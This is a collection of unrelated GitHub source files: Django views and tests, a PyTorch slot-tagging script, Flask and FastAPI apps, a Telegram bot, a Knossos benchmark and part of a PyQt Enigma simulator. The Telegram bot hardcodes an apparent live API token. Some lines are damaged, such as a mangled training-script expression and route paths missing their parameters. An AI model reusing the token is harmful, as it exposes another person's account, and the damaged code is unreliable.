value!\"],\n )\n\n def test_clean_operator(self):\n \"\"\"Field filter should validate operators.\"\"\"\n form = FieldFilterForm()\n form.cleaned_data = {}\n self.assertIsNone(form._clean_operator({}))\n self.assertIsNone(form._clean_operator({\"field\": \"\"}))\n self.assertIsNone(form._clean_operator({\"field\": \"name\"}))\n self.assertIsNone(form._clean_operator({\"field\": \"name\", \"operator\": \"\"}))\n self.assertEqual(\n \"exact\", form._clean_operator({\"field\": \"name\", \"operator\": \"exact\"})\n )\n self.assertEqual(\n form.errors[\"operator\"], [\"Operator 'exact' is not allowed for this field.\"]\n )\n\n # Valid setup.\n form = FieldFilterForm(\n field_operators={\"name\": [{\"key\": \"exact\", \"value\": \"Exact\"}]}\n )\n self.assertEqual(\n \"exact\", form._clean_operator({\"field\": \"name\", \"operator\": \"exact\"})\n )\n self.assertFalse(\"operator\" in form.errors)\n\n def test_clean_operator_with_or(self):\n \"\"\"Field filter should validate operators.\"\"\"\n form = FieldFilterForm(\n field_operators={\"name\": [{\"key\": \"exact\", \"value\": \"Exact\"}]}\n )\n self.assertEqual(\n \"exact\", form._clean_operator({\"field\": OR_SEPARATOR, \"operator\": \"exact\"})\n )\n self.assertFalse(\"operator\" in form.errors)\n","repo_name":"barqshasbite/django-admin-model-filters","sub_path":"model_filters/forms/field_filter_tests.py","file_name":"field_filter_tests.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14314192975","text":"\nfrom django import forms\nfrom django.shortcuts import render,redirect\nfrom .models import Product\nfrom .forms import ProducModelForm\n\ndef addOrder_view(request):\n form=ProducModelForm()\n if request.method=='POST':\n form=ProducModelForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('show')\n template_name='AddOrder.html'\n context={'form':form}\n return render(request,template_name,context)\n\ndef showOrder_view(request):\n obj=Product.objects.all()\n print(obj)\n template_name='ShowOrder.html'\n context={'obj':obj}\n return render(request,template_name,context)\n\ndef update_view(request,pk):\n obj=Product.objects.get(id=pk)\n form=ProducModelForm(instance=obj)\n if request.method=='POST':\n form=ProducModelForm(request.POST,instance=obj)\n if form.is_valid():\n form.save()\n return redirect('show')\n template_name='AddOrder.html'\n context={'form':form}\n return render(request,template_name,context)\n\ndef delete_view(request,pk):\n obj=Product.objects.get(id=pk)\n obj.delete()\n return redirect('show')\n\ndef home_view(request):\n template_name='Home.html'\n context={}\n return render(request,template_name,context)\n\n\n \n\n\n\n \n","repo_name":"Capthak/InventoryManagement","sub_path":"Project73/Project73/InventoryManagement/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73079986987","text":"import pandas as pd\nimport numpy as np\nfrom collections import Counter\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nfrom sklearn.model_selection import train_test_split,cross_val_score\nfrom sklearn.metrics import f1_score,accuracy_score,confusion_matrix,make_scorer\nseed=1\nnp.random.seed(seed)\ntorch.manual_seed(seed)\nrandom.seed(seed)\n\ntrain_df=pd.read_csv('./train_data.csv')\ntrain_df.head()\ntest_df=pd.read_csv('./test_data.csv')\ntest_df.head()\n\ntest_tags=[(' ').join(['O']*len(i.split())) for i in test_df['utterances'].values]\nprint (len(test_tags))\ntest_df['IOB Slot tags']=test_tags\ntest_df.head()\n\nall_df=pd.concat([train_df,test_df],ignore_index=True)\nall_df.head()\n\nfrom collections import defaultdict\nwordscount=defaultdict(list)\nfor i in train_df.values.tolist():\n s,t=i[0].split(),i[1].split()\n for j in range(len(s)):\n wordscount[s[j]].append(t[j])\n \nwordscount_={}\nfor k,v in wordscount.items():\n x=Counter(v).most_common()[0]\n # print (k,x)\n if(len(v)>1):\n wordscount_[k]=x[0]\n else:\n wordscount_[k]=''\n\nfrom tqdm import tqdm\ns_id,prevprev_word,prev_word,word,next_word,nextnext_word,prevprev_tag,prev_tag,tag,count=[],[],[],[],[],[],[],[],[],[]\nfor idx,row in tqdm(all_df.iterrows()):\n u_words,u_tags= row['utterances'].split(),row['IOB Slot tags'].split()\n assert len(u_words)==len(u_tags)\n for i in range(len(u_words)):\n s_id.append(idx)\n if i==0:\n prevprev_word.append('')\n prev_word.append('')\n # prevprev_tag.append('')\n # prev_tag.append('')\n elif i==1:\n prevprev_word.append('')\n prev_word.append(u_words[0])\n # prevprev_tag.append('')\n # prev_tag.append(u_tags[0])\n else:\n prevprev_word.append(u_words[i-2])\n prev_word.append(u_words[i-1])\n # prevprev_tag.append(u_tags[i-2])\n # prev_tag.append(u_tags[i-1])\n \n word.append(u_words[i])\n tag.append(u_tags[i])\n try:count.append(wordscount_[u_words[i]])\n except:count.append('')\n try:next_word.append(u_words[i+1])\n except:next_word.append('')\n try:nextnext_word.append(u_words[i+2])\n except:nextnext_word.append('')\n \n \n \nword_df=pd.DataFrame(zip(s_id,prevprev_word,prev_word,word,next_word,nextnext_word,count,tag),columns=['s_id','prevprev_word','prev_word','word','next_word','nextnext_word','count','tag'])\ny=word_df['tag'].values\nnum_train_words=sum(word_df['s_id']']+list(vocab)\nword2idx={vocab[i]:i for i in range(len(vocab))}\nidx2word={i:vocab[i] for i in range(len(vocab))}\nassert len(word2idx)==len(idx2word)\n\ntags=y.tolist()\ntags=set(tags)\nprint ('tags length:',len(tags))\n\ntags=list(tags)\ntag2idx={tags[i]:i for i in range(len(tags))}\nidx2tag={i:tags[i] for i in range(len(tags))}\nassert len(tag2idx)==len(idx2tag)\n\ndef vectorize_vocab(word2idx,*argv):\n groups=[]\n for sents in argv[0]:\n groups.append([[word2idx[j] for j in i] for i in sents])\n return groups\n\nx_train,x_val,x_test=vectorize_vocab(word2idx,[x_train,x_val,x_test])\nmax_len=max([len(i) for i in x_train])\n\ndef vectorize_tag(tag2idx,*argv):\n groups=[]\n for sents in argv[0]:\n groups.append([tag2idx[j] for j in sents])\n return groups\ny_train,y_val=vectorize_tag(tag2idx,[y_train,y_val])\n# assert max_len==max([len(i) for i in y_train])\n\nfrom torch.utils.data import Dataset, DataLoader\n\nclass MovieData(Dataset):\n def __init__(self, X, y):\n try:\n self.X = torch.tensor(X)\n except ValueError as e:\n self.X = [torch.tensor(i) for i in X]\n self.y = [torch.tensor(i) for i in y]\n\n def __len__(self):\n return len(self.y)\n\n def __getitem__(self,index):\n return self.X[index], self.y[index]\n\n\ntrain_dataset = MovieData(X=x_train,y=y_train)\nval_dataset = MovieData(X=x_val,y=y_val)\n\nbs=32\n\ntrain_dataloader = DataLoader(dataset=train_dataset,batch_size=bs,shuffle=True)\nval_dataloader = DataLoader(dataset=val_dataset,batch_size=bs,shuffle=True)\n\n\nclass LSTM_1(nn.Module):\n def __init__(self,vocab_size,embed_dim,num_class,hidden_size,padding_index=0):\n super(LSTM_1,self).__init__()\n self.emb = nn.Embedding(vocab_size, embed_dim, padding_idx=padding_index)\n self.rnn=nn.LSTM(input_size=embed_dim,hidden_size=hidden_size,num_layers=1,batch_first=True)\n self.fc1= nn.Linear(hidden_size,num_class)\n \n def forward(self,x):\n x=self.emb(x)\n out,h_n=self.rnn(x)\n h1=self.fc1(out[:,-1,:])\n return h1\n\nembed_size=200\nhidden_size=64\nclf = LSTM_1(vocab_size=len(vocab),embed_dim=embed_size,num_class=len(tags),hidden_size=hidden_size)\nloss_func = nn.NLLLoss()\nloss_func = nn.CrossEntropyLoss()\n\nclf = LSTM_1(vocab_size=len(vocab),embed_dim=embed_size,num_class=len(tags),hidden_size=hidden_size)\nlearning_rate=0.001\nnum_epochs=6\noptimizer = optim.Adam(clf.parameters(), lr=learning_rate)\nlosses = []\ntrain_losses,train_acc = [],[]\nval_losses, val_acc=[],[]\nmin_loss=1000\ntotal_step=len(train_dataloader)\n\nfor epoch in range(num_epochs):\n train_loss,correct=0,0\n total_tags=0\n total_val_tags=0\n for i,(X,y) in enumerate(train_dataloader):\n optimizer.zero_grad()\n # print (X.shape,y.shape)\n y_pred = clf(X)\n # print (y_pred.shape,y.shape)\n # break\n # break\n# break\n y=y.view(-1)\n loss = loss_func(y_pred, y)\n train_loss+=loss.item()\n\n y_pred=torch.argmax(y_pred,dim=1)\n y_pred,y=y_pred.flatten(),y.flatten()\n correct+= (y_pred==y).sum().item()\n total_tags+=y.shape[0]\n \n loss.backward()\n optimizer.step()\n if (i+1) % 50 == 0:\n print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}' \n .format(epoch+1, num_epochs, i+1, total_step, loss.item()))\n # break\n train_loss=round(train_loss/len(val_dataloader),3)\n acc=round(100*correct/total_tags,3)\n train_losses.append(train_loss)\n train_acc.append(acc)\n print (f\"Train loss: {train_loss} Train accuracy: {acc}\") \n\n val_loss,correct=0,0\n for i,(X,y) in enumerate(val_dataloader):\n y_pred = clf(X)\n y=y.view(-1)\n loss = loss_func(y_pred, y)\n val_loss+= round(loss.item(),3)\n\n y_pred=torch.argmax(y_pred,dim=1)\n # print (y_pred.shape)\n y_pred,y=y_pred.flatten(),y.flatten()\n # print (y[0:5],y_pred[0:5])\n # print ((y_pred==y).sum().item(),len(y),total_val_tags)\n correct+= (y_pred==y).sum().item()\n total_val_tags+=len(y)\n \n val_loss=round(val_loss/len(val_dataloader),3)\n\n if(val_loss\")\ndef get_user(id):\n\n if \"uuid\" not in session:\n redirect(\"/\")\n\n import json\n import os \n\n words_loc = os.getcwd() + \"/flask_app/static/words/animals.json\"\n\n # Opening JSON file\n with open(words_loc) as json_file:\n data = json.load(json_file)\n\n animal_list = []\n for x in range(3):\n if data[random.randint(0, len(data) - 1)] not in animal_list:\n animal_list.append(data[random.randint(0, len(data) - 1)].upper())\n \n\n context = {\n\n \"words\" : animal_list,\n 'user' : model_user.User.get_user_by_id( { \"id\": id } ),\n 'curUser': model_user.User.get_user_by_id( { \"id\": session['uuid'] } ),\n\n }\n\n\n\n\n return render_template(\"game.html\", **context)\n\n\n@app.route(\"/send/drawing\", methods=[\"POST\"])\ndef send_drawing():\n model_drawing.Drawing.save(request.form)\n return jsonify(message=\"SUCCESS\")\n\n\n@app.route(\"/get/answer\", methods=['POST'])\ndef get_drawing():\n drawing = model_drawing.Drawing.get_drawing_by_id(request.form)\n return jsonify(answer = drawing['word'])\n\n\n@app.route(\"/game/guess/\")\ndef guess_drawing(id):\n\n if \"uuid\" not in session:\n return redirect(\"/register\")\n\n drawing = model_drawing.Drawing.get_drawing_by_id({'id': id})\n\n if(drawing['receiver_id'] != session['uuid']):\n return redirect(\"/dashboard\")\n drawing['image'] = str(drawing['image'], encoding='utf-8')\n\n context = {\n \"drawing\": drawing,\n \"curUser\" : model_user.User.get_user_by_id({\"id\" : session['uuid']})\n }\n\n\n return render_template('guessing.html', **context )\n\n\n@app.route(\"/delete/drawing/\")\ndef delete_drawing(id):\n\n if \"uuid\" not in session:\n return redirect(\"/register\")\n \n drawing = model_drawing.Drawing.get_drawing_by_id({'id': id})\n\n if (session['uuid'] != drawing['receiver_id']):\n return redirect(\"/dashboard\")\n \n \n model_drawing.Drawing.delete({\"id\": id})\n return redirect(\"/dashboard\")\n\n","repo_name":"PPadilla44/draw_something","sub_path":"flask_app/controllers/controller_drawing.py","file_name":"controller_drawing.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2870166257","text":"# Perform basic string compression using counts of repeated characters\n# aabcccccaaa => a2b1c5a3\n# if compressed string isn't smaller, return original string\n# assume upper case and lower case letters\n\n# O(n) time, O(1) space\ndef compress(word):\n if len(word) < 2:\n return word\n result = ''\n idx = 0\n prev_char = word[0]\n count = 1\n while idx < len(word):\n next_char = word[idx]\n if prev_char != next_char and prev_char != '':\n result = result + prev_char\n result = result + str(count)\n prev_char = next_char\n count = 1\n else:\n count += 1\n idx += 1\n result = result + prev_char\n result = result + str(count)\n\n # return result\n if len(result) < len(word):\n return result\n else:\n return word\n\nresult = compress(\"aabcccccaaa\")\nprint(result)\n\nresult = compress(\"ab\")\nprint(result)\n\nresult = compress(\"\")\nprint(result)\n\nresult = compress(\"aaaabbbbb\")\nprint(result)","repo_name":"Sebbenbear/ctci","sub_path":"data-structures/Q1_6_StringCompression.py","file_name":"Q1_6_StringCompression.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28836553496","text":"import requests\nimport telebot\n\n\nbot = telebot.TeleBot(\"5923964405:AAE7gh9q7BH5NWcuUFyeh-wVP97H4mABSWM\")\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n\tbot.reply_to(message, \"Привет, как у тебя дела?\")\n\n@bot.message_handler(content_types=['text'])\ndef echo_all(message):\n if message.text == 'Погода':\n data = requests.get('https://wttr.in/?format=3')\n bot.reply_to(message, data.text)\n\nbot.infinity_polling()","repo_name":"SergeiKogutov/Python","sub_path":"lesen on Python/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42074982150","text":"import torch\nimport ksc.torch_frontend as knossos\n\nimport ksc.compile\nfrom ksc.torch_frontend import cpp_string_to_autograd_function\n\nembedded_cflags = ksc.compile.default_cflags\n\n\nembedded_cflags_opts = ksc.compile.CFlags.GCCOnly(\n [\"-march=native\", \"-funroll-loops\", \"-ffast-math\", \"-mprefer-vector-width=512\",]\n)\n\n\ncpp_inlined_map = \"\"\"\n #include \"knossos.h\"\n\n namespace ks{\n ks::Float sqrl(ks::allocator * $alloc, tensor<2, ks::Float> t) {\n auto tdata = t.data();\n ks::Float sum = 0.0;\n auto ne = t.num_elements();\n\n for (int i = 0; i != ne; ++i) {\n sum += tdata[i];\n }\n\n ks::Float outsum = 0.0;\n\n if (sum < 0.0) {\n for (int i = 0; i != ne; ++i) {\n ks::Float r = -0.125 * tdata[i];\n outsum += sin(r) * r;\n }\n } else {\n for (int i = 0; i != ne; ++i) {\n ks::Float r = 0.5 * tdata[i] * tdata[i];\n outsum += sin(r) * r;\n }\n }\n\n return outsum / ne;\n }\n\n tensor<2, ks::Float> sufrev_sqrl(ks::allocator * $alloc, tensor<2, ks::Float> t, ks::Float dret) {\n auto tdata = t.data();\n ks::Float sum = 0.0;\n auto ne = t.num_elements();\n\n auto ret = tensor<2, ks::Float>::create($alloc, t.size());\n auto retdata = ret.data();\n\n for (int i = 0; i != ne; ++i) {\n sum += tdata[i];\n }\n\n auto dscale = dret / ne;\n\n if (sum < 0.0) {\n for (int i = 0; i != ne; ++i) {\n ks::Float r = -0.125 * tdata[i];\n ks::Float dr = (sin(r) + cos(r) * r) * dscale;\n retdata[i] = -0.125 * dr;\n }\n } else {\n for (int i = 0; i != ne; ++i) {\n ks::Float r = 0.5 * tdata[i] * tdata[i];\n ks::Float dr = (sin(r) + cos(r) * r) * dscale;\n retdata[i] = tdata[i] * dr;\n }\n }\n\n return ret;\n }\n }\n \"\"\"\n\n\nembedded_cpp_entry_points = \"\"\"\n#include \"knossos-entry-points-torch.h\"\n\nks::Float entry(torch::Tensor t) {\n using namespace ks::entry_points;\n auto ks_t = convert_to_ks_viewing_tensordata>(t);\n auto ks_ret = ks::sqrl(&g_alloc, ks_t);\n return ks_ret;\n}\n\ntorch::Tensor entry_vjp(torch::Tensor t, ks::Float dret) {\n using namespace ks::entry_points;\n auto ks_t = convert_to_ks_viewing_tensordata>(t);\n auto ks_dret = dret;\n auto ks_ret = ks::sufrev_sqrl(&g_alloc, ks_t, ks_dret);\n return convert_from_ks(ks_ret);\n}\n\"\"\"\n\n\ndef sqrl_embedded_cpp_inlined_map():\n return cpp_string_to_autograd_function(\n cpp_inlined_map + embedded_cpp_entry_points,\n \"ksc_dl_activations__manual__sqrl_embedded_cpp_inlined_map\",\n extra_cflags=embedded_cflags,\n )\n\n\ndef sqrl_embedded_cpp_inlined_map_flags():\n return cpp_string_to_autograd_function(\n cpp_inlined_map + embedded_cpp_entry_points,\n \"ksc_dl_activations__manual__sqrl_embedded_cpp_inlined_map_flags\",\n extra_cflags=embedded_cflags + embedded_cflags_opts,\n )\n\n\n# run-bench: Knossos source, and \"nice\" PyTorch implementation\n# DOC-KS\n@knossos.register\ndef sqrl(x: torch.Tensor):\n \"\"\"\n sqrl: Squared Leaky Relu\n Like a capsule from /Stuck in a Rut/\n Typically x is a 4x4 tensor, possibly\n packed in a 4n x 4m array\n \"\"\"\n y = torch.sum(x)\n if y < 0.0:\n t = -0.125 * x\n else:\n t = 1 / 2 * x ** 2\n return torch.mean(torch.sin(t) * t)\n\n\n# ENDDOC-KS\n\n# run-bench: PyTorch \"fast\" implementation\ndef sqrl_pytorch(x: torch.Tensor):\n return sqrl.raw_f(x)\n\n\n# run-bench: PyTorch \"nice\" implementation\ndef sqrl_pytorch_nice(x: torch.Tensor):\n return sqrl.raw_f(x)\n\n\n# run-bench: Define a range of values at which to call the methods\ndef sqrl_bench_configs():\n yield torch.randn((4, 4))\n yield torch.randn((16, 16))\n\n\n#################################\n#\n# vsqrl - vectorized sqrl\n#\n\nvsqrl = knossos.register_direct(sqrl, vmap=True, generate_lm=True) # TODO: Carbuncle\n\n\ndef sqrl_pytorch_where(x):\n \"\"\"\n Replace \"if\" with \"where\" to get torch.vmap to work\n \"\"\"\n y = torch.sum(x)\n t = torch.where(y < 0, -0.125 * x, 1 / 2 * x ** 2)\n tsint = torch.sin(t) * t\n return torch.mean(tsint)\n\n\nimport torch._vmap_internals\n\nvsqrl_pytorch_nice = torch._vmap_internals.vmap(sqrl_pytorch_where)\n\n\ndef vsqrl_pytorch(x):\n \"\"\"\n Hand-vectorized pytorch implementation, assuming x is rank 3\n \"\"\"\n y = torch.sum(x, (1, 2), keepdim=True)\n y_lt_0 = (y < 0).repeat((1, *x.size()[1:]))\n t = torch.where(y_lt_0, -0.125 * x, 1 / 2 * x ** 2)\n tsint = torch.sin(t) * t\n return torch.mean(tsint, (1, 2))\n\n\n# run-bench: Define a range of values at which to call the methods\ndef vsqrl_bench_configs():\n yield torch.randn((10, 4, 4))\n yield torch.randn((1000, 4, 4))\n yield torch.randn((1000, 16, 16))\n","repo_name":"microsoft/knossos-ksc","sub_path":"examples/dl-capsule/sqrl.py","file_name":"sqrl.py","file_ext":"py","file_size_in_byte":5149,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"9121201865","text":"\"\"\"\nparameter flag\n 0->The function will return the whole list of streets\n 1->The function will return the list of streets that have to travel by to reach a goal\n\"\"\"\ndef search(lines, start, finish, flag=0):\n dict = {}\n\n for line, routes in lines.items():\n for route in routes:\n if start in route and finish in route:\n if route.index(start) < route.index(finish):\n #print(f\"{line} : {route}\\n\")\n if flag == 0:\n dict[line] = route\n elif flag == 1:\n dict[line] = route[route.index(start):route.index(finish)+1]\n else:\n return dict\n\n return dict","repo_name":"mikitomi21/Public_transport_timetable","sub_path":"Search_line.py","file_name":"Search_line.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"645920999","text":"from django.urls import path\nfrom post.views import postView, postEditView\n\nurlpatterns = [\n path('', postView.home, name=\"home\"),\n path('', postView.detail, name=\"detail\"),\n path('new/', postView.new, name=\"new\"),\n path('create/', postView.create, name=\"create\"),\n path('/delete', postView.delete, name=\"delete\"),\n path('edit/', postEditView.post_edit, name=\"edit\"),\n path('/update', postEditView.post_update, name=\"update\"),\n #모집요강\n path('edit/', postEditView.detailpage_update, name=\"detailupdate\"), \n]","repo_name":"SYULION9TH/2021-syu-club","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73904739252","text":"from fastapi import FastAPI\nimport uvicorn\nfrom pdf2docx import Converter\nfrom docx2pdf import convert\nimport pytesseract\nfrom PIL import Image\n\npytesseract.pytesseract.tesseract_cmd = r'D:\\Software\\Tesseract-OCR\\tesseract.exe'\n\napp = FastAPI(title=\"VAF-MIND2\")\n\n\n# pdf转docx\n@app.get(\"/pdf2docx\", summary='pdf转docx', tags=['pdf转docx'])\ndef pdf2docx(path: str = None):\n end = \"false\"\n # 调库进行转换\n cv = Converter(path)\n cv.convert(path[:-4] + \".docx\")\n cv.close()\n end = \"true\"\n return end\n\n\n# docx转pdf\n@app.get(\"/docx2pdf\", summary='docx转pdf', tags=['docx转pdf'])\ndef docx2pdf(path: str = None):\n end = \"false\"\n # 调库进行转换\n convert(path, path[:-5] + \".pdf\")\n end = \"true\"\n return end\n\n\n# 图片转文字\n@app.get(\"/img2text\", summary='图片转文字', tags=['图片转文字'])\ndef img2text(path: str = None):\n # print(path)\n # 调库进行转换\n image = Image.open(path)\n text = pytesseract.image_to_string(image, lang='chi_sim')\n # print(text)\n file_handle = open(path.split(\".\")[0] + \".txt\", mode='w', encoding='utf-8')\n file_handle.write(text)\n file_handle.close()\n return text\n\n\nif __name__ == '__main__':\n uvicorn.run(\"main:app\", host='0.0.0.0', port=9093)\n","repo_name":"tyza66/VA-File","sub_path":"backend/python/VAF-MIND2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42477949100","text":"# !/usr/bin/env python3\n# -*- codingg:utf-8 -*-\n# author:zlbd\n\n\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.pylab import *\nfrom bl import Lottery\n\n\nclass Panel:\n def __init__(self, data):\n self.data = data\n self.showEnable = True \n #self.showEnable = False \n\n def x(self, n):\n ks = []\n for k in range(0, n):\n ks.append(k)\n return np.array(ks)\n\n def y(self, lyst):\n return np.array(lyst)\n\n def show(self):\n if self.showEnable:\n bar(self.x(13), self.y(self.data.blues))\n bar(self.x(36), self.y(self.data.reds))\n show()\n\n\ndef main():\n lottery = Lottery('web.shtml')\n lottery.fixture()\n lottery.generate()\n panel = Panel(lottery)\n panel.show()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"zlbd/biglottery","sub_path":"src/blpanel.py","file_name":"blpanel.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2697457077","text":"import sys\nimport random\nimport csv\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow, QDialog\nfrom PyQt5.QtWidgets import QInputDialog, QFileDialog, QTableWidgetItem\nfrom addalphabetdialogue import Ui_Dialog as AddAlphabetDialogue\nfrom rotor_change import Ui_Dialog as RotorChangeDialogue\nfrom reflector_change import Ui_Dialog as ReflectorChangeDialogue\nfrom change_plug import Ui_Dialog as PlugChangeDialogue\nfrom Help import Ui_Dialog as HelpDialogue\nfrom main_window import Ui_MainWindow\n\n# Алфавит по умолчанию\n\nalphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\n\n# Класс диалогового окна выбора алфавита\n\nclass DialogWindowAddAlphabet(QDialog, AddAlphabetDialogue):\n def __init__(self, mainwindow):\n QDialog.__init__(self)\n self.setupUi(self)\n self.mainwindow = mainwindow\n self.buttonBox.accepted.connect(self.accept_alphabet)\n self.buttonBox.rejected.connect(self.reject_alphabet)\n\n # Добавление нового алфавита\n\n def accept_alphabet(self):\n name = self.lineEdit.text()\n alphabet = self.lineEdit_2.text()\n self.mainwindow.add_alphabet(name, alphabet)\n self.close()\n\n def reject_alphabet(self):\n self.close()\n\n\n# Класс диалогового окна настройки ротора\n\nclass DialogWindowChangeRotor(QDialog, RotorChangeDialogue):\n def __init__(self, mainwindow, rotor, number):\n QDialog.__init__(self)\n self.setupUi(self)\n self.mainwindow = mainwindow\n a, b, c = rotor\n self.lineEdit_perms.setText(a)\n self.lineEdit_turnover.setText(b)\n self.lineEdit_ring_set.setText(c)\n self.number = number\n\n self.pshb_Random_rotor.clicked.connect(self.random)\n self.buttonBox.accepted.connect(self.accept_rotor)\n self.buttonBox.rejected.connect(self.reject_rotor)\n\n def random(self):\n a, b, c = random_rotor()\n self.lineEdit_perms.setText(a)\n self.lineEdit_turnover.setText(b)\n self.lineEdit_ring_set.setText(c)\n\n def accept_rotor(self):\n rotor = self.lineEdit_perms.text(), self.lineEdit_turnover.text(), self.lineEdit_ring_set.text()\n self.mainwindow.rotors[self.number] = rotor\n self.close()\n\n def reject_rotor(self):\n self.close()\n\n\n# Класс диалогового окна настройки рефлектора\n\nclass DialogWindowChangeReflector(QDialog, ReflectorChangeDialogue):\n def __init__(self, mainwindow, reflector):\n QDialog.__init__(self)\n self.setupUi(self)\n self.mainwindow = mainwindow\n self.lineEdit_Reflector.setText(reflector)\n\n self.pshb_Random_reflector.clicked.connect(self.random)\n self.buttonBox.accepted.connect(self.accept_reflector)\n self.buttonBox.rejected.connect(self.reject_reflector)\n\n def random(self):\n self.lineEdit_Reflector.setText(create_reflector())\n\n def accept_reflector(self):\n self.mainwindow.reflector = self.lineEdit_Reflector.text()\n self.close()\n\n def reject_reflector(self):\n self.close()\n\n\n# Класс диалогового окна настройки коммутационной панели\n\nclass DialogWindowChangePlug(QDialog, PlugChangeDialogue):\n def __init__(self, mainwindow, plug_board):\n QDialog.__init__(self)\n self.setupUi(self)\n self.mainwindow = mainwindow\n\n reader = plug_board\n self.tableWidget.setColumnCount(2)\n self.tableWidget.setRowCount(0)\n for i, row in enumerate(reader):\n self.tableWidget.setRowCount(self.tableWidget.rowCount() + 1)\n for j, elem in enumerate(row):\n self.tableWidget.setItem(i, j, QTableWidgetItem(elem))\n\n self.pshb_Random.clicked.connect(self.random)\n self.buttonBox.accepted.connect(self.accept_reflector)\n self.buttonBox.rejected.connect(self.reject_reflector)\n\n def random(self):\n reader = create_plug_board(self.mainwindow.len_plug_board)\n self.tableWidget.setColumnCount(2)\n self.tableWidget.setRowCount(0)\n for i, row in enumerate(reader):\n self.tableWidget.setRowCount(self.tableWidget.rowCount() + 1)\n for j, elem in enumerate(row):\n self.tableWidget.setItem(i, j, QTableWidgetItem(elem))\n\n def accept_reflector(self):\n out = []\n for i in range(self.tableWidget.rowCount()):\n row = []\n for j in range(self.tableWidget.columnCount()):\n item = self.tableWidget.item(i, j)\n if item is not None:\n row.append(item.text())\n out.append(tuple(row))\n self.mainwindow.plug_board = out\n self.close()\n\n def reject_reflector(self):\n self.close()\n\n\n# Класс диалогового окна справки\n\nclass DialogWindowHelp(QDialog, HelpDialogue):\n def __init__(self):\n QDialog.__init__(self)\n self.setupUi(self)\n self.pushButton.clicked.connect(self.exit)\n\n def exit(self):\n self.close()\n\n\n# Основное окно программы\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.fname = 'untitled.txt'\n self.saved = False\n self.Open_Conf_Enable = True\n self.used_alphabets = ['Английский']\n self.alphabets = {\n 'Русский': 'АБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ',\n 'Английский': 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n }\n self.len_plug_board = 0\n self.create_elements()\n\n # Меню файл\n\n self.action_Create.triggered.connect(self.create_file)\n self.action_Open.triggered.connect(self.open_file)\n self.action_Save.triggered.connect(self.save_file)\n self.action_Save_as.triggered.connect(self.save_as_file)\n self.action_Exit.triggered.connect(self.exit_from_app)\n\n # Меню конфигурация\n\n self.action_Rotor1_change.triggered.connect(self.rotor1_change)\n self.action_Rotor2_change.triggered.connect(self.rotor2_change)\n self.action_Rotor3_change.triggered.connect(self.rotor3_change)\n self.action_Reflector_change.triggered.connect(self.reflector_change)\n self.action_Q_plug_board.triggered.connect(self.q_plug_change)\n self.action_Change_plug_board.triggered.connect(self.plug_change)\n self.action_Conf_open.triggered.connect(self.conf_open)\n self.action_Conf_save.triggered.connect(self.conf_save)\n\n # Меню алфавиты\n\n self.action_Choose_alphabet.triggered.connect(self.choose_alphabet)\n self.action_Add_alphabet.triggered.connect(self.add_alphabet_dial)\n\n # Вызов справки\n\n self.action_Help.triggered.connect(self.help)\n\n # Шифрование\n\n self.textEdit.textChanged.connect(self.encrypt)\n\n # Работа с файлами\n\n def create_file(self):\n self.saved = False\n self.fname = 'untitled.txt'\n self.textEdit.setText('')\n\n def open_file(self):\n self.saved = False\n self.fname = QFileDialog.getOpenFileName(self, 'Выберите текстовый документ (.txt)', '')[0]\n if self.fname == '':\n self.fname = 'untitled.txt'\n return\n try:\n with open(self.fname, 'rt') as f:\n text = f.read()\n self.textEdit.setText(text)\n self.label_Status.setText('')\n except:\n self.textEdit.setText('')\n self.label_Status.setText('Статус: Error encoding')\n\n def save_file(self):\n if self.saved:\n text = self.Encrypted.toPlainText()\n f = open(self.fname, 'w')\n f.write(text)\n f.close()\n else:\n self.save_as_file()\n\n def save_as_file(self):\n fname = QFileDialog.getSaveFileName(self, 'Сохранить файл', '', 'TXT (*.txt)')[0]\n if fname == '':\n return\n self.fname = fname\n self.saved = True\n text = self.Encrypted.toPlainText()\n f = open(self.fname, 'w')\n f.write(text)\n f.close()\n\n def exit_from_app(self):\n self.close()\n\n # Работа с конфигурацией машины\n\n def rotor1_change(self):\n rotor = self.rotors[0]\n DialogWindowChangeRotor_inst = DialogWindowChangeRotor(self, rotor, 0)\n DialogWindowChangeRotor_inst.show()\n DialogWindowChangeRotor_inst.exec()\n\n def rotor2_change(self):\n rotor = self.rotors[1]\n 